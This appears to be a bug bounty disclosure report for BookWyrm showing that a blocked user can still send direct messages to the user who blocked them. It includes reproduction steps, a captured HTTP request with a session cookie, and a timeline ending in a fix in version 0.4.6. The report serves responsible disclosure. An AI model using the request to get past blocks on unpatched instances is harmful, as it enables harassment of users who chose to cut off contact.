Send message to blocked user in bookwyrm-social/bookwyrm


Reported on

Aug 5th 2022


In this case if a userA block userB. UserB is still able to send private message to user A

Proof of Concept

1.USerA block userB 
2.UserB send direct request to message endpoint with userA''s userID

# Poc
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------63531825311408735291403048175
Content-Length: 940
DNT: 1
Connection: keep-alive
Cookie: csrftoken=; django_language=None; sessionid=suokqtn2cfu01jpoys18vni112ndmzjr
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
Pragma: no-cache
Cache-Control: no-cache

Content-Disposition: form-data; name="csrfmiddlewaretoken"

Content-Disposition: form-data; name="book"

Content-Disposition: form-data; name="user"

Content-Disposition: form-data; name="reply_parent"

Content-Disposition: form-data; name="content"

@Victim's Username   message
Content-Disposition: form-data; name="content_warning"

Content-Disposition: form-data; name="privacy"


# Impact

Sending message to a user even if he blocked  a specific user
We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. a year ago
We have contacted a member of the bookwyrm-social/bookwyrm team and are waiting to hear back a year ago
We have sent a follow up to the bookwyrm-social/bookwyrm team. We will try again in 7 days. a year ago
We have sent a second follow up to the bookwyrm-social/bookwyrm team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the bookwyrm-social/bookwyrm team. This report is now considered stale. a year ago
Mouse Reeve validated this vulnerability a year ago
Distorted_Hacker has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mouse Reeve marked this as fixed in 0.4.6 with commit 1f93dc a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation